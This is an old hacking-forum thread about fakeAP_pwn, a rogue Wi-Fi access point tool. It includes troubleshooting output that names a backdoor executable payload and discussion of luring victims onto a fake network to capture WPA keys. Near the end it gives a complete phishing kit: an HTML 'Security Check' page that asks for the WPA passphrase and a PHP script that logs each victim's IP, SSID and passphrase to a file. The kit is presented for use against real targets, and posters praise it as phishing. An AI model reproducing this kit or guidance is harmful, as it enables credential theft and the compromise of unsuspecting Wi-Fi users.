Re: [Script] [Video] fakeAP_pwn (v0.3)
Hi g0tmi1k
Thanks for answer.
I did tried it, but the result is the same, see the output please:Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
[*] fakeAP_pwn v0.3 (#126)
[+] Diagnostics mode
[>] Analyzing: Environment
[!] 'wlan0' isn't a wireless interface
[i] Found: wlan1
[+] Detecting: Kernel
[+] Detecting: Hardware
[+] Testing: Network
[i] interface=eth0
[i] wifiInterface=wlan1
[i] apInterface=at0
[i] essid=Free-WiFi
[i] channel=1
[i] apType=airbase-ng
[i] mode=non
[i] payload=wkv
[i] backdoorPath=/root/backdoor.exe
[i] www=/var/www/fakeAP_pwn
[i] respond2All=true
[i] macMode=random
[i] fakeMac=00:05:7c:9a:58:3f
[i] extras=false
[i] mtuMonitor=1800
[i] mtuAP=1400
[i] diagnostics=true
[i] verbose=1
[i] debug=false
[i] gateway=
[i] ourIP=10.0.0.1
[i] port=28493
[i] wifiDriver=rtl8187
[>] Configuring: Environment
[>] Removing: Temp files
[>] Stopping: Daemons & Programs
./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
[>] Configuring: Wireless card
[i] monitorInterface=mon0
[>] Configuring: MAC address
[i] mac=00:0a:00:70:4d:95 (Mediatek Corp.)
[>] Creating: Scripts
[>] Creating: Exploit (Windows)
[>] Creating: Access point
[>] Configuring: Network
[>] Configuring: Permissions
[>] Starting: DHCP
[>] Starting: DNS
[>] Starting: Exploit
[>] Starting: Web server
[+] Testing: Web server
[>] Monitoring: Connections
[i] Waiting for the target to run the "update" file
But the problem remains, people associate, but very fast the MAC change to incomplete and I can't access anyone, neither over ICMP, TCP or UDP.
Also, I see this frequently:
[>] Stopping: Daemons & Programs
./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
Is it a well-known problem?
So, I can't be in a place where a lot of wireless network is in use? There is a workaround?Alot of clients are trying to connect/probing... That might an issue.
Why VM is bad? Because of performance? What do you recommend?Your also using VM as well as airbase-ng. Both of theses have issues.
See, I tried hostapd, but if failed very ugly, see below please.
[*] fakeAP_pwn v0.3 (#126)
[+] Diagnostics mode
[>] Analyzing: Environment
[!] 'wlan0' isn't a wireless interface
[i] Found: wlan1
Usage: iw [options] command
Options:
--debug enable netlink debugging
--version show version
Commands:
help
event
list
phy <phyname> info
dev <devname> set channel <channel> [HT20|HT40+|HT40-]
phy <phyname> set channel <channel> [HT20|HT40+|HT40-]
dev <devname> set freq <freq> [HT20|HT40+|HT40-]
phy <phyname> set freq <freq> [HT20|HT40+|HT40-]
phy <phyname> set name <new name>
dev <devname> set meshid <meshid>
dev <devname> set monitor <flag> [...]
dev <devname> info
dev <devname> del
dev <devname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
phy <phyname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
dev <devname> station dump
dev <devname> station set <MAC address> plink_action <open|block>
dev <devname> station del <MAC address>
dev <devname> station get <MAC address>
dev <devname> mpath dump
dev <devname> mpath set <destination MAC address> next_hop <next hop MAC address>
dev <devname> mpath new <destination MAC address> next_hop <next hop MAC address>
dev <devname> mpath del <MAC address>
dev <devname> mpath get <MAC address>
reg set <ISO/IEC 3166-1 alpha2>
dev <devname> get mesh_param <param>
dev <devname> set mesh_param <param> <value>
[!] wlan1 *MIGHT* not suported by hostapd
[+] Detecting: Kernel
[+] Detecting: Hardware
[+] Testing: Network
[+] Testing: Internet connection
[i] interface=eth0
[i] wifiInterface=wlan1
[i] apInterface=wlan1
[i] essid=Free-WiFi
[i] channel=1
[i] apType=hostapd
[i] mode=transparent
[i] payload=wkv
[i] backdoorPath=/root/backdoor.exe
[i] www=/var/www/fakeAP_pwn
[i] respond2All=true
[i] macMode=random
[i] fakeMac=00:05:7c:9a:58:3f
[i] extras=false
[i] mtuMonitor=1800
[i] mtuAP=1400
[i] diagnostics=true
[i] verbose=1
[i] debug=false
[i] gateway=192.168.167.2
[i] ourIP=10.0.0.1
[i] port=37800
[i] wifiDriver=rtl8187
[>] Configuring: Environment
[>] Removing: Temp files
[>] Stopping: Daemons & Programs
./fakeAP_pwn.sh: line 75: 5619 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
[i] interface (eth0) IP=192.168.167.129
[>] Configuring: Wireless card
[!] Couldn't detect monitorInterface
[i] Quiting
./fakeAP_pwn.sh: line 75: 5656 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
[>] Restoring: Environment
[>] Restoring: Programs[*] Done! (= Have you... g0tmi1k?
Ideas?
I can't confirm because hostapd is not working.I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
airbase-ng is kind of broken? There is a fix?
Yes.Does the target have a gateway IP? DNS?
Sorry, it's more like a general wireless hacking question, not completely related to the outputs above.I don't understand what you're saying about about "WPATARGET".
The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSID are different?]
The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.
I mean, I configured the fake AP to answer to all probes. I want to compromise the network called WPATARGET, my fake AP will answer when someone ask for WPATARGET (I see this on the logs).
However, the real WAPTARGET has WPA protection and my fake AP is OPEN. So my question is, the real clients (my victims) any how will connect to my fake (OPEN) WPATARGET? Or no way, since the original use encryption (WPA).
I mean, assuming the target clients use Windows Zero configuration and has WPATARGET saved.
Thanks a lot and congratulations for good work.
Re: [Script] [Video] fakeAP_pwn (v0.3)
fakeAP_pwn v0.3 #127
Fixed: "Creating temp folder" bug
Fixed: "Debug output" bug
Fixed: "WiFi driver" bug
Fixed: "WiFi Key" bug
Updated: Internal working
Updated: "Update" function
http://code.google.com/p/fakeap-pwn/source/detail?r=127
Download
http://www.mediafire.com/?j2hz9rce10zh1w3
Last edited by g0tmi1k; 11-12-2010 at 01:51 PM.
Have you...g0tmi1k?
Re: [Script] [Video] fakeAP_pwn (v0.3)
@rick.m
Next time please could you use CODE tags and or pastebin... *Makes reading/understanding "easier"*
No, it's not a well known error (first I've hear of it!).Originally Posted by rick.m
I'll have a look into it. (I missed it when I was doing 127, I'll try and find a fix for my next release)
I dunno if that is the issue (the mass of wireless networks!), it's a bit hard for me to test this in my lab as well...
Some how I cant see it being an issue, but it's a possibility of why its not working anyway...
The only "fix" I could think of right now, would be to use different hardware/drivers and or hostapd. But I really don't know. Just guessing.
It's recommend not to use VM mainly because of performance, does also have a few odd issues.
Personally, airbase-ng works ALOT better if used in a real install over VM. Hostapd is the same in both.
I Recommend doing a real into of backtrack! (If you can install direct onto the HDD, else a USB stick)
That MAY be a bug. Not sure. I'll have a look into it as well
Yes, airbase-ng does have a few issues - thought this is mainly compatibility issues with your hardware/drivers.
The best fix - get another wifi card. If you cant for whatever reason, change how your running backtrack.
Yes?
What are you saying yes to?
fakeAP_pwn isn't YET meant to compromise another wifi, its planned - just not fully coded yet. Just....too "many moving part" at the mo that need fixing before that happens...
As far as I know, Windows Zero configuration is different in XP to Windows Vista/7. It behaves different. Which OS is your target running?
Anyway, back to your main question. I'm going to need a bit more information from you, for example - the output from -d, and the tmp/ folder etc. What is your network setup? What hardware? Software? etc etc,..
Last edited by g0tmi1k; 11-14-2010 at 10:42 PM.
Have you...g0tmi1k?
Re: [Script] [Video] fakeAP_pwn (v0.3)
When do you expect fakeAP to be able to compromise another wifi AP?
That is what you need to capture the WPA key for a network if you do not want to use dictionary attack. I am testing the ability to create a fakeAP to replace a current one and see if I can then knock off the connected machines and have them connect instead to my fakeAP and enter there WPA key so I can capture it. I have read that you can setup airbase to look like its WPA or wpa 2 encripted but then accept any passphrase to allow connection. Woundnt that be better for your wpa key finder approach in FakeAP then to setup a fake webpage and wait for the user to install the update. It would be much easyer to get the WPA key that is for sure.
Have you tried to set it up like that?
Re: [Script] [Video] fakeAP_pwn (v0.3)
Compromise another wifi AP is planned for v0.7.
However, in another project I'm currently coding, wiffy - is able to do a fakeAP attack. (It's in beta at the mo).
For the record, you'll still going to need to do a dictionary attack, its just a different method of getting the handshake.
The pass-phase is still going to be sent salted, not in plain text.
Yes, I've tired that - however its not going to be added till v0.7.
Have you...g0tmi1k?
Re: [Script] [Video] fakeAP_pwn (v0.3)
Ahh ok.. damn so even if they send the WPA key it will be like capturing the handshake and doing a standard dictionary attack? No real benefit to it? Or does this capture reveal more of the key like its length or something for example?
If you have that kind of ability to have them connected to your fake ap you would think you could get the key with no fuss.
Maybe running a app to infiltrate there system is necessary after all. There WPA key is stored under network properties under the ESSID.
Thanks for the reply Ill keep looking into this..
Re: [Script] [Video] fakeAP_pwn (v0.3)
below is some sample work for the wpa project
Code:<html> <head> <title>Security Check</title> <script type="text/javascript"> function checkWholeForm(theForm) { var why = ""; why += checkPassword(theForm.password.value); if (why != "") { alert(why); return false; } return true; } function checkPassword (strng) { var error = ""; if (strng == "") { error = "You didn't enter a password.\n"; } else if ((strng.length < 8) || (strng.length > 63)) { error = "The password is the wrong length.\n"; } return error; } </script> <style type="text/css"> h3 { font-family:Arial,Helvetica,sans-serif; margin-top:200px; } td { font-family:Arial,Helvetica,sans-serif; font-size:13px; font-weight:900; } </style> </head> <body> <h3 align="center">Please confirm your wireless security settings.</h3> <table align="center"> <form action="process.php" onsubmit="return checkWholeForm(this)" method="post"> <tr> <td align="right">SSID:</td> <td><input type="text" name="ssid" size="30" disabled="disabled" value="linksys"></td> </tr> <tr> <td align="right">Authentication Type:</td> <td> <select name="Authentication Type" size="1" disabled="disabled"> <option selected value="WPA">WPA</option> </select> </td> </tr> <tr> <td align="right">Passphrase:</td> <td> <input type="password" name="password" size="30"> </td> </tr> <tr> <td> </td> <td align="left"> <input type="submit" value="Submit"> </td> </tr> </form> </table> </body> </html>Code:<?php header("Location:wpa.html"); $file=fopen("keys.txt","a") or exit("Unable to open file!"); $logMsg = $_SERVER["REMOTE_ADDR"] . " " . $_POST['ssid'] . " " . $_POST['password'] . "\n"; fputs($file,$logMsg); fclose($file); ?>
Last edited by joker5bb; 11-29-2010 at 03:46 AM.
Re: [Script] [Video] fakeAP_pwn (v0.3)
A nice little phishing attack serve it up from webserver on bt? bit like login phishing neat idea. No need for a host banning you
Keep up the good work
regards dee
Re: [Script] [Video] fakeAP_pwn (v0.3)
well im redoing the whole thing with jquery & ajax
there will be client-side and server-side validation, output to .txt file with ip & passphrase
also we can write commands to php file to check if the passphrase is correct.
We are now talking of using 3 wifi cards.
Re: [Script] [Video] fakeAP_pwn (v0.3)
Well then luckily I have 3 wifi cards
Posting Permissions
